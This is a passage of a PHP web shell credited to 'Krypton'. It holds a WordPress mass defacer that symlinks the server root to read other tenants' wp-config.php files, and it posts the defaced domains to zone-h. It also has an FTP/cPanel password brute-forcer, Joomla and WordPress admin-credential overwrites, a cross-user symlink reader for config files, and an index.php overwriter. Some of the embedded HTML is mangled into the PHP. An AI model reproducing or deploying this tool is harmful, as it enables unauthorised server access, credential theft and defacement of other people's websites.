  1339.             } else {
  1340.                 $output .= "[+] index.php Failed+<br>";
  1341.                 $cond = 1;
  1342.             }
  1343.         } else {
  1344.             $output .= "[-] DB Error<br>";
  1345.         }
  1346.         global $base_path;
  1347.         unlink($base_path . 'COOKIE.txt');
  1348.         return array(
  1349.             'cond' => $cond,
  1350.             'output' => $output
  1351.         );
  1352.     }
  1353.     function exec_mode_1($def_url)
  1354.     {
  1355.         @mkdir('sym', 0777);
  1356.         $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1357.         $fp = @fopen('sym/.htaccess', 'w');
  1358.         fwrite($fp, $wr);
  1359.         @symlink('/', 'sym/root');
  1360.         $dominios = @file_get_contents("/etc/named.conf");
  1361.         @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  1362.         $out[1]          = array_unique($out[1]);
  1363.         $numero_dominios = count($out[1]);
  1364.         echo "Total Websites: $numero_dominios <br><br>";
  1365.         $def                = file_get_contents($def_url);
  1366.         $def                = urlencode($def);
  1367.         $base_url           = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/sym/root/home/';
  1368.         $output             = fopen('defaced.html', 'a+');
  1369.         $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st'] != '') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] : 0) : 0;
  1370.         $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st'] != '') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] : 0) : 0;
  1371.         echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Script</th><th>Process</th><th>Results</th></tr>';
  1372.         $j  = 1;
  1373.         $st = (isset($_GET['st']) && $_GET['st'] != '') ? $_GET['st'] : 0;
  1374.         for ($i = $st; $i <= $numero_dominios; $i++) {
  1375.             $domain       = $out[1][$i];
  1376.             $dono_arquivo = @fileowner("/etc/valiases/" . $domain);
  1377.             $infos        = @posix_getpwuid($dono_arquivo);
  1378.             $config02     = @file_get_contents($base_url . $infos['name'] . "/public_html/wp-config.php");
  1379.             $cls          = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  1380.             if ($config02 && preg_match('/DB_NAME/i', $config02)) {
  1381.                 echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . $i . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
  1382.                 echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  1383.                 $res = index_changer_wp($config02, $def);
  1384.                 echo '<td>' . $res['output'] . '</td>';
  1385.                 if ($res['cond']) {
  1386.                     echo '<td align="center"><span class="green">HACKED</span></td>';
  1387.                     fwrite($output, 'http://' . $domain . "<br>");
  1388.                     $_SESSION['count2'] = $_SESSION['count2'] + 1;
  1389.                 } else {
  1390.                     echo '<td align="center"><span class="red">unsuccessful</span></td>';
  1391.                 }
  1392.                 echo '</tr>';
  1393.             }
  1394.         }
  1395.         echo '</table>';
  1396.         echo '<hr/>';
  1397.         echo 'Total Deface = ' . ($_SESSION['count1'] + $_SESSION['count2']) . '<br>';
  1398.         echo '<a href="defaced.html" target="_blank">List Websites Defaced</a><br>';
  1399.     }
  1400.     echo '<head><p><h2 style="color:#FF0000;text-align: center;font-family:orbitron;font-size:25px;">Wordpress Mass Defacer</h2><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">body {color: white;font-family: "orbitron";}.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}</style></p><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';} }function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><div class="footer"><a href="https://facebook.com/Krypton" target="_blank"><h3 style="text-align: center;">' . base64_decode('S3J5cHRvbg==') . '</h3></a></div><div>';
  1401.     if (!isset($_POST['form_action'])) {
  1402.         echo '<div align="center"><center><img class="HoverBorder" alt="" src="http://data.whicdn.com/images/109178420/large.jpg";' . $tunisia . '" /></center><form action="" method="post"><input type="hidden" name="form_action" value="1"><br>index url:<input class="inputz" type="text" name="indexadresi" size="30" value="http://site.com/index.html" /><br><br><input class="inputzbut" type="submit" value="Deface" name="Submit"></form> </div>';
  1403.     }
  1404.     echo '<div align="center">';
  1405.     if ($_POST['form_action'] == 1) {
  1406.         exec_mode_1($_POST['indexadresi']);
  1407.     }
  1408.     echo '</div></div></body></html>';
  1409. } elseif (isset($_GET['x']) && ($_GET['x'] == 'zone-h')) {
  1410.     $defacer         = 'Krypton';
  1411.     $display_details = 0;
  1412.     $method          = 14;
  1413.     $reason          = 5;
  1414.     error_reporting(0);
  1415.     set_time_limit(0);
  1416.     if (!function_exists('curl_init')) {
  1417.         echo "CURL ERROR\n";
  1418.         exit;
  1419.     }
  1420.     $cli = (isset($argv[0])) ? 1 : 0;
  1421.     if ($cli == 1) {
  1422.         $file  = $argv[1];
  1423.         $sites = file($file);
  1424.         if (!file_exists($file)) {
  1425.             echo "<br><br><center><h1>error !</h1></center>\n";
  1426.             exit;
  1427.         }
  1428.     } else {
  1429.         if (function_exists(apache_setenv)) {
  1430.             @apache_setenv('no-gzip', 1);
  1431.         }
  1432.         @ini_set('zlib.output_compression', 0);
  1433.         @ini_set('implicit_flush', 1);
  1434.         @ob_implicit_flush(true);
  1435.         @ob_end_flush();
  1436.         if (isset($_POST['domains'])) {
  1437.             $sites = explode("\n", $_POST['domains']);
  1438.         }
  1439.         if (file_exists($_FILES["file"]["tmp_name"])) {
  1440.             $file  = $_FILES["file"]["tmp_name"];
  1441.             $sites = file($file);
  1442.         }
  1443.         echo <<<EOF
  1444. <div align="center"><table width="67%"><tr><td align=center></td></tr></table><br><pre>
  1445. EOF;
  1446.         if (!isset($_POST['defacer'])) {
  1447.             echo <<<EOF
  1448. <form enctype="multipart/form-data" method="POST"><div align='center'><span lang='en-us'><b>Defacer&nbsp;:</b></span><input class='inputz' name="defacer" type="text" value="$defacer" /><br/><table width='55%'><tr><td align='center'><span lang='en-us'><b>Domains:</b></span><p align='center'>&nbsp;<textarea rows='30' name='domains' cols='50' class='inputz'></textarea><br/><span lang='en-us'><b>OR</b></span><br/>Submit form .txt file:<br/><input name="file" type="file" /><br><br/><br/><input class='inputzbut' type='submit' value='    Send    ' name='submit'></p></td></tr></table></form>
  1449. EOF;
  1450.         }
  1451.         $defacer = $_POST['defacer'];
  1452.     }
  1453.     if (!$sites) {
  1454.         echo '</pre>';
  1455.         exit;
  1456.     }
  1457.     $sites = array_unique(str_replace('http://', '', $sites));
  1458.     $total = count($sites);
  1459.     echo "[+] Total unique domain: $total\n\n";
  1460.     $pause = 10;
  1461.     $start = time();
  1462.     $main  = curl_multi_init();
  1463.     for ($m = 0; $m < 3; $m++) {
  1464.         $http[] = curl_init();
  1465.     }
  1466.     for ($n = 0; $n < $total; $n += 30) {
  1467.         if ($display_details == 1) {
  1468.             for ($x = 0; $x < 30; $x++) {
  1469.                 echo '[+] Adding ' . rtrim($sites[$n + $x]) . '';
  1470.                 echo "\n";
  1471.             }
  1472.         }
  1473.         $d = $n + 30;
  1474.         if ($d > $total) {
  1475.             $d = $total;
  1476.         }
  1477.         echo "=====================>[$d/$total]\n";
  1478.         for ($w = 0; $w < 3; $w++) {
  1479.             $p = $w * 10;
  1480.             if (!(isset($sites[$n + $p]))) {
  1481.                 $pause = $w;
  1482.                 break;
  1483.             }
  1484.             $posts[$w] = "defacer=$defacer&domain1=http%3A%2F%2F" . rtrim($sites[$n + $p]) . "&domain2=http%3A%2F%2F" . rtrim($sites[$n + $p + 1]) . "&domain3=http%3A%2F%2F" . rtrim($sites[$n + $p + 2]) . "&domain4=http%3A%2F%2F" . rtrim($sites[$n + $p + 3]) . "&domain5=http%3A%2F%2F" . rtrim($sites[$n + $p + 4]) . "&domain6=http%3A%2F%2F" . rtrim($sites[$n + $p + 5]) . "&domain7=http%3A%2F%2F" . rtrim($sites[$n + $p + 6]) . "&domain8=http%3A%2F%2F" . rtrim($sites[$n + $p + 7]) . "&domain9=http%3A%2F%2F" . rtrim($sites[$n + $p + 8]) . "&domain10=http%3A%2F%2F" . rtrim($sites[$n + $p + 9]) . "&hackmode=" . $method . "&reason=" . $reason . "&submit=Send";
  1485.             $curlopt   = array(
  1486.                 CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',
  1487.                 CURLOPT_RETURNTRANSFER => true,
  1488.                 CURLOPT_FOLLOWLOCATION => true,
  1489.                 CURLOPT_ENCODING => true,
  1490.                 CURLOPT_HEADER => false,
  1491.                 CURLOPT_HTTPHEADER => array(
  1492.                     "Keep-Alive: 7"
  1493.                 ),
  1494.                 CURLOPT_CONNECTTIMEOUT => 3,
  1495.                 CURLOPT_URL => 'http://www.zone-h.com/notify/mass',
  1496.                 CURLOPT_POSTFIELDS => $posts[$w]
  1497.             );
  1498.             curl_setopt_array($http[$w], $curlopt);
  1499.             curl_multi_add_handle($main, $http[$w]);
  1500.         }
  1501.         $running = null;
  1502.         do {
  1503.             curl_multi_exec($main, $running);
  1504.         } while ($running > 0);
  1505.         for ($m = 0; $m < 3; $m++) {
  1506.             if ($pause == $m) {
  1507.                 break;
  1508.             }
  1509.             curl_multi_remove_handle($main, $http[$m]);
  1510.             $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
  1511.             if ($code != 200) {
  1512.                 while (true) {
  1513.                     echo ' [-]Error!....Retrying';
  1514.                     echo "\n";
  1515.                     sleep(5);
  1516.                     curl_exec($http[$m]);
  1517.                     $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
  1518.                     if ($code == 200) {
  1519.                         break 1;
  1520.                     }
  1521.                 }
  1522.             }
  1523.         }
  1524.     }
  1525.     $end = time() - $start;
  1526.     echo 'Done';
  1527.     echo "\n\n[*]Time: $end seconds\n";
  1528.     curl_multi_close($main);
  1529.     if ($cli == 0) {
  1530.         echo '</pre></body></html>';
  1531.     }
  1532.     exit;
  1533. }
  1534.  elseif (isset($_GET['x']) && ($_GET['x'] == 'about')) {
  1535.     echo '<br><center><k>WebShell Recoded By NoNameUser</k><br><br>S I R N A Merupakan Shell hasil recode dari shell k2ll33d & Sadness Shell , <br>kemudian ditambahkan beberapa fungsi-fungsi agar shell lebih powerful dan userfriendly.<br>
  1536.        beberapa fungsi diambil dari shell yang sudah ada dan selebihnya merupakan kreasi penulis sendiri.<br>shell ini aman dan bersih dari yang namanya Logger meskipun script ini diencode, <br>penulis tidak menyisipkan Logger pada gambar ataupun dalam script PHP ini.
  1537.        <br><k>Mail:&nbsp;<a href=mailto:htaccess12@gmail.com>Error Violence</a><br><br><a href="https://facebook.com/errorviolence" target="_blank">Facebook</k></a>&nbsp;</center><iframe width="0" height="0" src="https://www.youtube.com/embed/a3sbfHu-6Fk?autoplay=1" frameborder="0" allowfullscreen></iframe>';
  1538. }
  1539. elseif (isset($_GET['x']) && ($_GET['x'] == 'brute')) {
  1540.     $connect_timeout = 5;
  1541.     set_time_limit(0);
  1542.     $submit    = $_REQUEST['submit'];
  1543.     $users     = $_REQUEST['users'];
  1544.     $pass      = $_REQUEST['passwords'];
  1545.     $target    = $_REQUEST['target'];
  1546.     $cracktype = $_REQUEST['cracktype'];
  1547.     if ($target == "") {
  1548.         $target = "localhost";
  1549.     }<div align="center"><form method="POST" style="border:1px solid #000000"><br>function ftp_check($host, $user, $pass, $timeout)
  1550.     {
  1551.         $ch = curl_init();
  1552.         curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  1553.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1554.         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1555.         curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1556.         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1557.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1558.         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1559.         $data = curl_exec($ch);
  1560.         if (curl_errno($ch) == 28) {
  1561.             print "<b>Connection Timed out</b>";
  1562.             exit;
  1563.         } elseif (curl_errno($ch) == 0) {
  1564.             print "<table width='67%'><tr><td align=center><b>Username ($user) | Password ($pass)</b></td></tr></table>";
  1565.         }
  1566.         curl_close($ch);
  1567.     }
  1568.     function cpanel_check($host, $user, $pass, $timeout)
  1569.     {
  1570.         $ch = curl_init();
  1571.         curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  1572.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1573.         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1574.         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1575.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1576.         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1577.         $data = curl_exec($ch);
  1578.         if (curl_errno($ch) == 28) {
  1579.             print "<b>Connection Timed out</b>";
  1580.             exit;
  1581.         } elseif (curl_errno($ch) == 0) {
  1582.             print "<table width='67%'><tr><td align=center><b>[+]Username ($user) | Password ($pass)</b></td></tr></table>";
  1583.         }
  1584.         curl_close($ch);
  1585.     }
  1586.     if (isset($submit) && !empty($submit)) {
  1587.         if (empty($users) && empty($pass)) {
  1588.             print "<p><b>Error : Check The Users and Password List</b></p>";
  1589.             exit;
  1590.         }
  1591.         if (empty($users)) {
  1592.             print "<p><b>Error :Check The Users List</b></p>";
  1593.             exit;
  1594.         }
  1595.         if (empty($pass)) {
  1596.             print "<p><b>Error :Check The Password List</b></p>";
  1597.             exit;
  1598.         }
  1599.         ;
  1600.         $userlist = explode("\n", $users);
  1601.         $passlist = explode("\n", $pass);
  1602.         print "<b>[~] Wait ...</b><br><br>";
  1603.         foreach ($userlist as $user) {
  1604.             $pureuser = trim($user);
  1605.             foreach ($passlist as $password) {
  1606.                 $purepass = trim($password);
  1607.                 if ($cracktype == "ftp") {
  1608.                     ftp_check($target, $pureuser, $purepass, $connect_timeout);
  1609.                 }
  1610.                 if ($cracktype == "cpanel") {
  1611.                     cpanel_check($target, $pureuser, $purepass, $connect_timeout);
  1612.                 }
  1613.             }
  1614.         }
  1615.     }
  1616.     echo "<form method=POST action=''><table width='67%'><tr><td><br><p align='center'><b><span lang='en-us'>IP</span> :<input class='inputz' type='text' name='target' size='16' value=$target></b></p><div align='center'><p align='center'>users<textarea class='inputz' cols=20 rows=20 name='users'>";
  1617.     system('ls /var/mail');
  1618.     echo "</textarea>passwords<textarea class='inputz' cols=20 rows=20 name='passwords'>123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\nadmin\n332211\n1478963\npassword\npasswd\n159357\n357951\n114477\npass\nPassword</textarea><br><br><input name='cracktype' value='cpanel' checked type='radio'></span><b>Cpanel(2082)</b><input name='cracktype' value='ftp' style='font-weight: 700;' type='radio'></font></font><font style='font-weight: 700;' size='2' face='Tahoma'><span style='font-weight: 700;'>Ftp (21)</span></p><br><center><input class='inputzbut' type='submit' value='Start Cracking' name='submit'></center></td></tr></table></td></tr></form>";
  1619.     die();
  1620. } elseif (isset($_GET['x']) && ($_GET['x'] == 'joomla')) {
  1621.     if (empty($_POST['pwd'])) {
  1622.         echo "<center><br><br><br><FORM method='POST'><br><br><br>DB_Prefix :&nbsp;&nbsp;<INPUT class ='inputz' size='15' value='jos_' name='prefix' type='text'>&nbsp;host :&nbsp;&nbsp;<INPUT class ='inputz' size='15' value='localhost' name='localhost' type='text'>&nbsp;database :&nbsp;&nbsp;<INPUT class ='inputz' size='15' value='database' name='database' type='text'>&nbsp;username :&nbsp;&nbsp;<INPUT class ='inputz' size='15' value='db_user' name='username' type='text'>&nbsp;password :&nbsp;&nbsp;<INPUT class ='inputz' size='15' value='db_pass' name='password' type='text'><br>&nbsp;&nbsp;<br>New Username:&nbsp;&nbsp;<INPUT class ='inputz' name='admin' size='15' value='k2'><br><br>New Password:&nbsp;&nbsp;<INPUT class ='inputz' name='pwd' size='15' value='123123'><br><br>&nbsp;&nbsp;<INPUT value='change' class='inputzbut' name='send' type='submit'></FORM>";
  1623.     } else {
  1624.         $prefix    = $_POST['prefix'];
  1625.         $localhost = $_POST['localhost'];
  1626.         $database  = $_POST['database'];
  1627.         $username  = $_POST['username'];
  1628.         $password  = $_POST['password'];
  1629.         $admin     = $_POST['admin'];
  1630.         $pd        = ($_POST["pwd"]);
  1631.         $pwd       = md5($pd);
  1632.         @mysql_connect($localhost, $username, $password) or die(mysql_error());
  1633.         @mysql_select_db($database) or die(mysql_error());
  1634.         $SQL = @mysql_query("UPDATE " . $prefix . "users SET username ='" . $admin . "' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die(mysql_error());
  1635.         $SQL = @mysql_query("UPDATE " . $prefix . "users SET password ='" . $pwd . "' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die(mysql_error());
  1636.         if ($SQL)
  1637.             echo "<br><br><center><h1>Done... go and login</h1></center>";
  1638.     }
  1639. } elseif (isset($_GET['x']) && ($_GET['x'] == 'domains')) {
  1640.     echo "<br><br><p align=center>Domains and Users</p>";
  1641.     $d0mains = @file("/etc/named.conf");
  1642.     if (!$d0mains) {
  1643.         die("<center>Error : i can't read [ /etc/named.conf ]</center>");
  1644.     }
  1645.     echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';
  1646.     foreach ($d0mains as $d0main) {
  1647.         if (eregi("zone", $d0main)) {
  1648.             preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1649.             flush();
  1650.             if (strlen(trim($domains[1][0])) > 2) {
  1651.                 $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
  1652.                 echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
  1653.                 flush();
  1654.             }
  1655.         }
  1656.     }
  1657.    
  1658. }
  1659. elseif (isset($_GET['krypton'])) {
  1660.     global $do, $scnya;
  1661.     function defacean($scnya){
  1662.         $do=$_SERVER['DOCUMENT_ROOT'];
  1663.         chdir($do);
  1664.         if(function_exists('fopen') && function_exists('fwrite'))
  1665.         {
  1666.             $script=fopen("index.php", "wb");
  1667.             if($script)
  1668.             {
  1669.                 fwrite($script, $scnya);
  1670.                 echo '<script>alert("Berhasil Deface :v => index.php");</script>';
  1671.             }
  1672.             else
  1673.             {
  1674.              echo '<script>alert("Akses Ditolak")</script>';
  1675.             }
  1676.             fclose($script);
  1677.         }
  1678.     }
  1679. <br/><br/>
  1680. }
  1681. elseif (isset($_GET['x']) && ($_GET['x'] == 'wordpress')) {
  1682.     if (empty($_POST['pwd'])) {
  1683.         echo "<br><br><br><br><br><br><FORM method='POST'>DB_Prefix :  <INPUT class ='inputz' size='15' value='wp_' name='prefix' type='text'>&nbsp;&nbsp;host     :  <INPUT class ='inputz' size='15' value='localhost' name='localhost' type='text'>&nbsp;&nbsp;database :  <INPUT class ='inputz' size='15' value='Database' name='database' type='text'>&nbsp;&nbsp;username :  <INPUT class ='inputz' size='15' value='db_user' name='username' type='text'>&nbsp;&nbsp;password :  <INPUT class ='inputz' size='15' value='db_pass' name='password' type='text'>&nbsp;&nbsp;<br><br>New username :  <INPUT class ='inputz' name='admin' size='15' value='k2'><br><br>New password :  <INPUT class ='inputz' name='pwd' size='15' value='123123'><br>&nbsp;&nbsp;<br><INPUT class='inputzbut' value='change' name='send' type='submit'></FORM>";
  1684.     } else {
  1685.         $prefix    = $_POST['prefix'];
  1686.         $localhost = $_POST['localhost'];
  1687.         $database  = $_POST['database'];
  1688.         $username  = $_POST['username'];
  1689.         $password  = $_POST['password'];
  1690.         $pwd       = $_POST['pwd'];
  1691.         $admin     = $_POST['admin'];
  1692.         @mysql_connect($localhost, $username, $password) or die(mysql_error());
  1693.         @mysql_select_db($database) or die(mysql_error());
  1694.         $hash = crypt($pwd);
  1695.         $k2 = @mysql_query("UPDATE " . $prefix . "users SET user_login ='" . $admin . "' WHERE ID = 1") or die(mysql_error());
  1696.         $k2 = @mysql_query("UPDATE " . $prefix . "users SET user_pass ='" . $hash . "' WHERE ID = 1") or die(mysql_error());
  1697.         if ($k2) {
  1698.             echo '<br><br><center><h1>Done ... go and login</h1></center>';
  1699.         }
  1700.     }
  1701.     echo '</center>';
  1702. } elseif (isset($_GET['x']) && ($_GET['x'] == 'string')) {
  1703.     $text = $_POST['code'];<center><form method="post"><br><br><br><textarea class='inputz' cols=80 rows=5 name="code">Krypton</textarea><br><br><select class='inputz' size="1" name="ope"><option value="base64">Base64</option><option value="md5">md5</option><option value="whash">Crypt</option><option value="SHA1">SHA1</option><option value="urlencode">URL Encoding</option><option value="md4">md4</option><option value="SHA256">SHA256</option></select>&nbsp;<input class='inputzbut' type='submit' value='encrypt'></form>$op = $_POST["ope"];
  1704.     switch ($op) {
  1705.         case 'base64':
  1706.             $codi = base64_encode($text);
  1707.             break;
  1708.         case 'md5':
  1709.             $codi = md5($text);
  1710.             break;
  1711.         case 'whash':
  1712.             $codi = crypt($text);
  1713.             break;
  1714.         case 'SHA1':
  1715.             $codi = sha1($text);
  1716.             break;
  1717.         case 'urlencode':
  1718.             $codi = urlencode($text);
  1719.             break;
  1720.         case 'md4':
  1721.             $codi = hash("md4", $text);
  1722.             break;
  1723.         case 'SHA256':
  1724.             $codi = hash("sha256", $text);
  1725.             break;
  1726.         default:
  1727.             break;
  1728.     }
  1729.     echo '<textarea cols=80 rows=10 class="inputz" readonly>' . $codi . '</textarea></center>';
  1730. }
  1731. elseif (isset($_GET['x']) && ($_GET['x'] == 'sym')) {
  1732.     @set_time_limit(0);
  1733.     @mkdir('sym', 0777);
  1734.     error_reporting(0);
  1735.     $htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1736.     $op       = @fopen('sym/.htaccess', 'w');
  1737.     fwrite($op, $htaccess);
  1738.     echo '<center><br><br><form method="post"> File Path:<br><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br>Symlink Name<br><input class="inputz" type="text" name="symfile" value="s.txt" size="60"/><br><br><input class="inputzbut" type="submit" value="symlink" name="symlink" /><br><br></form></center>';
  1739.     $target  = $_POST['file'];
  1740.     $symfile = $_POST['symfile'];
  1741.     $symlink = $_POST['symlink'];
  1742.     if ($symlink) {
  1743.         @symlink("$target", "sym/$symfile");
  1744.         echo '<br><center><a target="_blank" href="sym/' . $symfile . '" >' . $symfile . '</a><center>';
  1745.     }
  1746. }
  1747.  elseif (isset($_GET['x']) && ($_GET['x'] == 'cmsdet')) {
  1748.     echo $bencong . "<center><p class='font-effect-shadow-multiple' style=font-family:Ubuntu;font-size:25px;color:#58FAF4;><b>CMS Detector</b></p>";
  1749. <form action="?sad=echo $pwd;&x=cmsdet" method="post">
  1750. <br><br>
  1751. if (!file_exists('ag.tmp')) {
  1752.         @fopen('ag.tmp', 'w');
  1753.        
  1754.         echo '<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  1755.         echo '<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>';
  1756.        
  1757.         $p = 0;
  1758.        
  1759.         if (is_readable("/var/named")) {
  1760.             $list        = scandir("/var/named");
  1761.             $current_dir = posix_getcwd();
  1762.             $dir         = explode("/", $current_dir);
  1763.             foreach ($list as $domain) {
  1764.                 if (strpos($domain, ".db")) {
  1765.                     $domain = str_replace('.db', '', $domain);
  1766.                     $owner  = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
  1767.                    
  1768.                     error_reporting(0);
  1769.                    
  1770.                     $link = $pageURL . 'pee/' . $owner['name'];
  1771.                    
  1772.                     cms_add($link, $domain, $owner['name'], "WordPress");
  1773.                     cms_add($link, $domain, $owner['name'], "Joomla");
  1774.                     cms_add($link, $domain, $owner['name'], "vBulletin");
  1775.                     cms_add($link, $domain, $owner['name'], "WHMCS");
  1776.                     cms_add($link, $domain, $owner['name'], "PhpBB");
  1777.                     cms_add($link, $domain, $owner['name'], "MyBB");
  1778.                     cms_add($link, $domain, $owner['name'], "IPB");
  1779.                     cms_add($link, $domain, $owner['name'], "SMF");
  1780.                     cms_add($link, $domain, $owner['name'], "Drupal");
  1781.                     cms_add($link, $domain, $owner['name'], "e107");
  1782.                     cms_add($link, $domain, $owner['name'], "Seditio");
  1783.                     cms_add($link, $domain, $owner['name'], "osCommerce");
  1784.                    
  1785.                 }
  1786.             }
  1787.         }
  1788.     } else {
  1789.         echo '<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  1790.         echo '<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>';
  1791.         $content = file_get_contents($pageURL . 'ag.tmp');
  1792.         echo $content;
  1793.     }
  1794. }
  1795.  
  1796. elseif (isset($_GET['x']) && ($_GET['x'] == 'phpinfo')) {
  1797.     @ob_start();
  1798.     @eval("phpinfo();");
  1799.     $buff = @ob_get_contents();
  1800.     @
  1801.     $awal  = strpos($buff, "<body>") + 6;
  1802.     $akhir = strpos($buff, "</body>");
  1803.     echo "<div class='phpinfo'>" . substr($buff, $awal, $akhir - $awal) . "</div>";
  1804. } elseif (isset($_GET['view']) && ($_GET['view'] != "")) {
  1805.     if (is_file($_GET['view'])) {
  1806.         if (!isset($file))
  1807.             $file = magicboom($_GET['view']);
  1808.         if (!$win && $posix) {
  1809.             $name  = @posix_getpwuid(@fileowner($file));
  1810.             $group = @posix_getgrgid(@filegroup($file));
  1811.             $owner = $name['name'] . "<span class='gaya'> : </span>" . $group['name'];
  1812.         } else {
  1813.             $owner = $user;
  1814.         }
  1815.         $filn = basename($file);
  1816.         echo "<table style='margin:6px 0 0 2px;line-height:20px;'> <tr><td>Filename</td><td><span id='" . clearspace($filn) . "_link'>" . $file . "</span> <form action='?sad=" . $pwd . "&amp;view=$file' method='post' id='" . clearspace($filn) . "_form' class='sembunyi' style='margin:0;padding:0;'> <input type='hidden' name='oldname' value='" . $filn . "' style='margin:0;padding:0;' /> <input class='inputz' style='width:200px;' type='text' name='newname' value='" . $filn . "' /> <input class='inputzbut' type='submit' name='rename' value='rename' /> <input class='inputzbut' type='submit' name='cancel' value='cancel' onclick='tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');' /> </form> </td></tr> <tr><td>Size</td><td>" . ukuran($file) . "</td></tr> <tr><td>Permission</td><td>" . get_perms($file) . "</td></tr> <tr><td>Owner</td><td>" . $owner . "</td></tr> <tr><td>Create time</td><td>" . date("d-M-Y H:i", @filectime($file)) . "</td></tr> <tr><td>Last modified</td><td>" . date("d-M-Y H:i", @filemtime($file)) . "</td></tr> <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", @fileatime($file)) . "</td></tr> <tr><td>Actions</td><td><a href='?sad=$pwd&amp;edit=$file'>edit</a> | <a href=\"javascript:tukar(\"" . clearspace($filn) . "_link','" . clearspace($filn) . "_form\");\">rename</a> | <a href='?sad=$pwd&amp;delete=$file'>delete</a> | <a href='?sad=$pwd&amp;dl=$file'>download</a>&nbsp;(<a href='?sad=$pwd&amp;dlgzip=$file'>gzip</a>)</td></tr> <tr><td>View</td><td><a href='?sad=" . $pwd . "&amp;view=" . $file . "'>text</a> | <a href='?sad=" . $pwd . "&amp;view=" . $file . "&amp;type=code'>code</a> | <a href='?sad=" . $pwd . "&amp;view=" . $file . "&amp;type=image'>image</a></td></tr></table>";
  1817.         if (isset($_GET['type']) && ($_GET['type'] == 'image')) {
  1818.             echo "<div style='text-align:center;margin:8px;'><img src='?sad=" . $pwd . "&amp;img=" . $filn . "'></div>";
  1819.         } elseif (isset($_GET['type']) && ($_GET['type'] == 'code')) {
  1820.             echo "<div class='viewfile'>";
  1821.             $file = wordwrap(@file_get_contents($file), "240", "\n");
  1822.             @highlight_string($file);
  1823.             echo "</div>";
  1824.         } else {
  1825.             echo "<div class='viewfile'>";
  1826.             echo nl2br(htmlentities((@file_get_contents($file))));
  1827.             echo "</div>";
  1828.         }
  1829.     } elseif (is_dir($_GET['view'])) {
  1830.         echo showdir($pwd, $prompt);
  1831.     }
  1832. } elseif (isset($_GET['edit']) && ($_GET['edit'] != "")) {
  1833.     if (isset($_POST['save'])) {
  1834.         $file    = $_POST['saveas'];
  1835.         $content = magicboom($_POST['content']);
  1836.         if ($filez = @fopen($file, "w")) {
  1837.             $time = date("d-M-Y H:i", time());
  1838.             if (@fwrite($filez, $content))
  1839.                 $msg = "file saved <span class='gaya'>@</span> " . $time;
  1840.             else
  1841.                 $msg = "failed to save";
  1842.             @fclose($filez);
  1843.         } else
  1844.             $msg = "permission denied";
  1845.     }
  1846.     if (!isset($file))
  1847.         $file = $_GET['edit'];
  1848.     if ($filez = @fopen($file, "r")) {
  1849.         $content = "";
  1850.         while (!feof($filez)) {
  1851.             $content .= htmlentities(str_replace("''", "'", fgets($filez)));
  1852.         }
  1853.         @fclose($filez);
  1854.     }<form action="?sad=echo $pwd;&amp;edit=echo $file;" method="post"> <table class="cmdbox"> <tr><td colspan="2">
  1855. <textarea class="output" name="content">
  1856. echo $content;</textarea> <tr>
